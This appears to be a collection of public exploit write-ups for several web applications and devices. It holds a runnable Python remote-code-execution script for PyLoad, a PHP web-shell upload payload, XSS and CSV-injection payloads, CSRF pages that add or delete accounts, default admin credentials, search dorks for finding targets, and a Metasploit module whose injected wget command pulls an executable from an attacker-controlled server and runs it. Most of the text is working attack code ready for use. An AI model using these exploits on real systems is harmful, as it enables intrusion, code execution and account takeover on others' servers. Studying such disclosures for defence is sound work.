<pre><code>====================================================================================================================================<br />| # Title : phpFK v8.0 version XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : https://www.frank-karau.de/demo-forum/ | <br />| # Dork : Powered by: phpFK |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}<br /><br />[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)<br /># Date: 06-10-2023<br /># Credits: bAu @bauh0lz <br /># Exploit Author: Gabriel Lima (0xGabe)<br /># Vendor Homepage: https://pyload.net/<br /># Software Link: https://github.com/pyload/pyload<br /># Version: 0.5.0<br /># Tested on: Ubuntu 20.04.6<br /># CVE: CVE-2023-0297<br /><br />import requests, argparse<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')<br />parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')<br />arguments = parser.parse_args()<br /><br />def doRequest(url):<br /> try:<br /> res = requests.get(url)<br /> if res.status_code == 200:<br /> return True<br /> else:<br /> return False<br /><br /> except requests.exceptions.RequestException as e:<br /> print("[!] Maybe the host is offline :", e)<br /> exit()<br /><br />def runExploit(url, cmd):<br /> endpoint = url + '/flash/addcrypted2'<br /> if " " in cmd:<br /> validCommand = cmd.replace(" ", "%20")<br /> else:<br /> validCommand = cmd<br /><br /> payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'<br /> test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)<br /> print('[+] The exploit has be executeded in target machine. ')<br /><br />def main(targetUrl, Command):<br /> print('[+] Check if target host is alive: ' + targetUrl)<br /> alive = doRequest(targetUrl)<br /> if alive == True:<br /> print("[+] Host up, let's exploit! ")<br /> runExploit(targetUrl,Command)<br /> else:<br /> print('[-] Host down! ')<br /><br />if(arguments.url != None and arguments.cmd != None):<br /> targetUrl = arguments.url<br /> Command = arguments.cmd<br /> main(targetUrl, Command)<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: projectSend r1605 - CSV injection<br />Version: r1605<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date of found: 11-06-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Windows<br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. login as user<br />step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )<br />step 3. Set name as =calc|a!z|<br />step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php )<br /><br />payload: =calc|a!z|<br /><br /></code></pre>
<pre><code>Exploit Title: projectSend r1605 - Stored XSS<br />Application: projectSend<br />Version: r1605<br />Bugs: Stored Xss<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date of found: 11-06-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br /><br />1. Login as admin<br />2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)<br />3. Go to new JS (http://localhost/custom-assets-add.php?language=js)<br />4. Set content as alert("xss"); and set public <br />5. And Save<br />6. Go to http://localhost (logout)<br /><br />payload: alert("xss")<br /><br />POST /custom-assets-add.php HTTP/1.1<br />Host: localhost<br />Content-Length: 171<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/custom-assets-add.php?language=js<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l<br />Connection: close<br /><br />csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Rest-Cafe and Restaurant Website CMS 2.0.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.2(64-bit) | <br />| # Vendor : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 | <br />| # Dork : "news.php?slug=" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] leaves a default set of administrative credentials installed post installation.<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload :Login<br /><br />Super Admin<br /><br />Username: sadmin@gmail.com<br /><br />Password: 1234<br /><br />Admin<br /><br />Username: admin@gmail.com<br /><br />Password: 1234 <br /><br />[+] https://127.0.0.1/nominomidelight.com/admin/visual_settings<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : QUICKAD CMS 7.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/quickad-classified-ads-php-script/19960675?s_rank=189 | <br />| # Dork : "Bylancer, All right reserved" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 61.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /admin/panel/admin_add.php . <br /><br />[+] http://127.0.0.1/q7.3/admin/panel/admin_add.php .<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /><br /> <!-- Google fonts --><br /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,400,400italic,500,900%7CRoboto+Slab:300,400%7CRoboto+Mono:400" /><br /><br /> <!-- Page JS Plugins CSS --><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick.min.css" /><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slick/slick-theme.min.css" /><br /> <!-- css select2 --><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2.min.css" /><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/select2/select2-bootstrap.css" /><br /> <!-- Zeunix CSS stylesheets --><br /> <link rel="stylesheet" id="css-font-awesome" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/font-awesome.css" /><br /> <link rel="stylesheet" id="css-ionicons" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/ionicons.css" /><br /> <link rel="stylesheet" id="css-bootstrap" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/bootstrap.css" /><br /> <link rel="stylesheet" id="css-app" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app.css" /><br /> <link rel="stylesheet" id="css-app-custom" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/app-custom.css" /><br /> <link rel="stylesheet" id="css-app-animation" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/animation.css" /><br /> <!-- End Stylesheets --><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/css/category.css" /><br /><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/asscrollable/asScrollable.min.css"><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/slidepanel/slidePanel.min.css"><br /> <link rel="stylesheet" href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/datatables/jquery.dataTables.min.css" /><br /><br /><br /> <!--alerts CSS --><br /> <link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/sweetalert/sweetalert.css" rel="stylesheet" type="text/css"><br /> <link href="https://127.0.0.1/classified.bylancer.com/admin/assets/js/plugins/alertify/alertify.min.css" rel="stylesheet" type="text/css"><br /><br /> <script><br /> var sidepanel_ajaxurl = 'https://127.0.0.1/classified.bylancer.com/admin/ajax_sidepanel.php';<br /> </script><br /></head><br /><br /><body class="app-ui layout-has-drawer layout-has-fixed-header"><br /><br /><div class="app-layout-canvas"><br /> <div class="app-layout-container"><br /><br /><br /> <aside class="app-layout-drawer"><br /><br /> <!-- Drawer scroll area --><br /> <div class="app-layout-drawer-scroll"><br /> <!-- Drawer logo --><br /> <div id="logo" class="drawer-header"><br /> <br /> <br /><main class="app-layout-content"><br /><br /> <!-- Page Content --><br /> <div class="container-fluid p-y-md"><br /> <!-- Partial Table --><br /> <div class="card"><br /> <div class="card-header"><br /> <h4>Admin users</h4><br /> <div class="pull-right"><br /> <a href="#" data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" class="btn btn-success waves-effect waves-light m-r-10">Add Admin User</a><br /> </div><br /> </div><br /> <div class="card-block"><br /> <div id="js-table-list"><br /> <table id="ajax_datatable" data-jsonfile="https://127.0.0.1/classified.bylancer.com/admin/admins.php" class="js-table-checkable table table-vcenter table-hover" data-tablesaw-mode="stack" data-plugin="animateList" data-animate="fade" data-child="tr" data-selectable="selectable"><br /> <thead><br /> <tr><br /> <th class="text-center w-5 sortingNone"><br /> <label class="css-input css-checkbox css-checkbox-default m-t-0 m-b-0"><br /> <input type="checkbox" id="check-all" name="check-all"><span></span><br /> </label><br /> </th><br /> <th><i class="ion-image"></i> Admin user</th><br /> <th class="w-10">Email</th><br /> <th style="width: 60px;">Actions</th><br /> </tr><br /> </thead><br /> <tbody id="ajax-services"><br /><br /> </tbody><br /> </table><br /><br /> </div><br /><br /><br /> </div><br /> <!-- .card-block --><br /> </div><br /> <!-- .card --><br /> <!-- End Partial Table --><br /><br /> </div><br /> <!-- .container-fluid --><br /> <!-- End Page Content --><br /><br /></main><br /><script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /><div class="site-action"><br /> <button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button><br /> <button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating"><br /> <i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i><br /> <i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i><br /> </button><br /> <div class="site-action-buttons"><br /> <button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"<br /> class="btn-raised btn btn-danger btn-floating animation-slide-bottom"><br /> <i class="icon ion-android-delete" aria-hidden="true"></i><br /> </button><br /> </div><br /></div><br /><br /> <div class="col-md-12"><br /> <!-- Site Action --><br /><div class="site-action"><br /> <button data-url="https://127.0.0.1/classified.bylancer.com/admin/panel/admin_add.php" data-toggle="slidePanel" id="slidepanel-show" style="display: none;"> </button><br /> <button type="button" class="site-action-toggle btn-raised btn btn-success btn-floating"><br /> <i class="front-icon ion-android-add animation-scale-up" aria-hidden="true"></i><br /> <i class="back-icon ion-android-close animation-scale-up" aria-hidden="true"></i><br /> </button><br /> <div class="site-action-buttons"><br /> <button type="button" data-ajax-response="deletemarked" data-ajax-action="deleteadmin"<br /> class="btn-raised btn btn-danger btn-floating animation-slide-bottom"><br /> <i class="icon ion-android-delete" aria-hidden="true"></i><br /> </button><br /> </div><br /></div><br /><br /> <div class="form-group"><br /> <label for="exampleInputfullname">Full Name<code></code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-person"></i></div><br /> <input type="text" class="form-control" id="exampleInputfullname" placeholder="Full Name" name="name" required=""><br /> <span class="help-block"></span><br /> </div><br /> </div><br /> </div><br /><br /> <h4 class="box-title">User Login Details</h4><br /> <hr><br /> <div class="col-md-12"><br /> <div class="form-group"><br /> <label for="exampleInputuname">Username<code>*</code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-person"></i></div><br /> <input type="text" class="form-control" id="exampleInputuname" placeholder="Username" name="username" required=""><br /> </div><br /> </div><br /> </div><br /><br /> <div class="col-md-12"><br /> <div class="form-group"><br /> <label for="exampleInputEmail1">Email address<code></code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-android-mail"></i></div><br /> <input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" name="email" required=""><br /> </div><br /> </div><br /> </div><br /> <div class="col-md-12"><br /> <div class="form-group"><br /> <label for="exampleInputpwd1">Password<code></code></label><br /> <div class="input-group"><br /> <div class="input-group-addon"><i class="ion-android-lock"></i></div><br /> <input type="password" class="form-control" id="exampleInputpwd1" placeholder="Login Password" name="password" required=""><br /> </div><br /> </div><br /> </div><br /> </div><br /><br /> <div class="row"><br /><br /> </div><br /><br /> <br /><br /> </div><br /><br /> </form><br /> </div><br /> </div><br /> </div><br /> <!-- /.row --><br /> </div><br /></div><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)<br /># Google Dork: n/a<br /># Date: 09/06/2023<br /># Exploit Author: Ramil Mustafayev (kryptohaker)<br /># Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php<br /># Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip<br /># Version: 1.0<br /># Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28<br /># CVE : n/a<br /><br />Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.<br /><br />To exploit this vulnerability, an attacker needs to do the following:<br /><br />1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/<br />2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com<br />3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:<br /><br /><html><br /> <body><br /> <form action="http://example.com/update.php" method="GET"><br /> <input type="hidden" name="demail" value="victim@example.com" /><br /> </form><br /> <script><br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html<br />5. Send the URL of the HTML page to the admin user via email, social media, or any other means.<br /><br />If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.<br /><br /><br /></code></pre>
<pre><code>Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation<br />Date: 17-01-2023<br />EXPLOIT-AUTHOR: AFFAN AHMED<br />Vendor Homepage: <https://phpgurukul.com><br />Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/><br />Version: 1.0<br />Tested on: Windows 11 + XAMPP<br />CVE : CVE-2023-3187<br /><br />===============================<br />STEPS_TO_REPRODUCE<br />===============================<br />1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”<br />Password: Test@123”<br />2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image<br />3. Open the Burp-suite and Intercept the Edit Image Request<br />4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”<br />5. Change the **Content-type from “ image/png “ to “ image/gif “<br />6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`<br />7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**<br />8. Below is the Burpsuite-POST Request for all the changes that I have made above<br /><br />==========================================<br />BURPSUITE_REQUEST<br />==========================================<br />POST /trms/teacher/changeimage.php HTTP/1.1<br />Host: localhost<br />Content-Length: 442<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: <http://localhost><br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: <http://localhost/trms/teacher/changeimage.php><br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc<br />Connection: close<br /><br />------WebKitFormBoundaryndAPYa0GGOxSUHdF<br />Content-Disposition: form-data; name="subjects"<br /><br />John Doe<br />------WebKitFormBoundaryndAPYa0GGOxSUHdF<br />Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"<br />Content-Type: image/gif<br /><br />GIF89a <?php echo system($_REQUEST['dx']); ?><br /><br />------WebKitFormBoundaryndAPYa0GGOxSUHdF<br />Content-Disposition: form-data; name="submit"<br /><br /><br />------WebKitFormBoundaryndAPYa0GGOxSUHdF--<br /><br /><br />===============================<br />PROOF_OF_CONCEPT<br />===============================<br />GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md<br /><br /></code></pre>
<pre><code>Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities <br />Google Dork: NA<br />Date: 09-06-2023<br />EXPLOIT-AUTHOR: AFFAN AHMED<br />Vendor Homepage: <https://www.sourcecodester.com/><br />Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code><br />Version: 1.0<br />Tested on: Windows 11 + XAMPP<br />CVE : CVE-2023-3184<br /><br />==============================<br />CREDENTIAL TO USE<br />==============================<br />ADMIN-ACCOUNT<br />USERNAME: admin<br />PASSWORD: admin123<br /><br />=============================<br />PAYLOAD_USED<br />=============================<br />1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a><br />2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a><br />3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a><br />4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a><br /><br /><br />===============================<br />STEPS_TO_REPRODUCE<br />===============================<br />1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN <br />2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` <br />3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username` <br />4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON<br />5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED .<br />6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE<br /><br /><br /><br />==========================================<br />BURPSUITE_REQUEST<br />==========================================<br />POST /php-sts/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />Content-Length: 1037<br />sec-ch-ua: <br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36<br />sec-ch-ua-platform: ""<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/php-sts/admin/?page=user/manage_user<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn<br />Connection: close<br /><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="id"<br /><br /><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="firstname"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="middlename"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="lastname"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="username"<br /><br /><a href=//evil.com>CLICK_HERE_FOR_USERNAME</a><br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="password"<br /><br />1234<br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundary7hwjNQW3mptDFOwo<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundary7hwjNQW3mptDFOwo--<br /><br />===============================<br />PROOF_OF_CONCEPT<br />===============================<br />GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.<br /> The S100 through S350 (End of Life) models should be vulnerable to<br /> unauthenticated exploitation due to a session handling vulnerability.<br /> Later models require authentication which is not provided in this module because we can't test it.<br /> The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).<br /> Run 'check' first to determine if vulnerable.<br /> The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT<br /> and LPORT while testing this module.<br /> },<br /> 'Author' => [<br /> 'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module<br /> 'Justin Fatuch Apt4hax', # Exploit PoC<br /> 'Robert Bronstein' # Metasploit Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-40022'],<br /> ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']<br /> ],<br /> 'DisclosureDate' => '2022-08-31',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [ 'Automatic', {} ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),<br /> OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),<br /> OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])<br /> ], self.class<br /> )<br /> end<br /><br /> def primer; end<br /><br /> def on_request_uri(cli, req)<br /> @pl = generate_payload_exe<br /> print_status("#{peer} - Payload request received: #{req.uri}")<br /> send_response(cli, @pl)<br /> end<br /><br /> def check<br /> uri = '/controller/ping.php'<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => uri,<br /> 'vars_post' =><br /> {<br /> 'currentTab' => 'ping',<br /> 'refreshMode' => 'dirty',<br /> 'ethDirty' => 'false',<br /> 'snmpCfgDirty' => 'false',<br /> 'snmpTrapDirty' => 'false',<br /> 'pingDirty' => 'true',<br /> 'hostname' => "\`id\`",<br /> 'port' => 'eth0',<br /> 'pingType' => 'ping'<br /> }<br /> })<br /> if res && res.body.to_s =~ /uid=0/<br /> Exploit::CheckCode::Vulnerable<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def request(cmd)<br /> uri = '/controller/ping.php'<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'Content-Type' => 'application/x-www-form-encoded',<br /> 'uri' => uri,<br /> 'vars_post' =><br /> {<br /> 'currentTab' => 'ping',<br /> 'refreshMode' => 'dirty',<br /> 'ethDirty' => 'false',<br /> 'snmpCfgDirty' => 'false',<br /> 'snmpTrapDirty' => 'false',<br /> 'pingDirty' => 'true',<br /> 'hostname' => cmd,<br /> 'port' => 'eth0',<br /> 'pingType' => 'ping'<br /> }<br /> })<br /> end<br /><br /> def exploit<br /> srvhost = datastore['SRVHOST']<br /> srvport = datastore['SRVPORT']<br /> filename = datastore['FILENAME']<br /> resource_uri = '/' + filename<br /> shell_path = '/tmp/'<br /> cmds = [<br /> "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",<br /> "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",<br /> "\`" + shell_path + filename + "\`"<br /> ]<br /> start_service({<br /> 'Uri' => {<br /> 'Proc' => proc { |cli, req|<br /> on_request_uri(cli, req)<br /> },<br /> 'Path' => resource_uri<br /> }<br /> })<br /> print_status("#{rhost}:#{rport} - Exploit started...")<br /> print_status("#{rhost}:#{rport} - Sending wget command...")<br /> request(cmds[0])<br /> sleep(3)<br /> print_status("#{rhost}:#{rport} - Making payload executable...")<br /> request(cmds[1])<br /> sleep(3)<br /> print_status("#{rhost}:#{rport} - Executing payload...")<br /> request(cmds[2])<br /> sleep(3)<br /> end<br />end<br /></code></pre>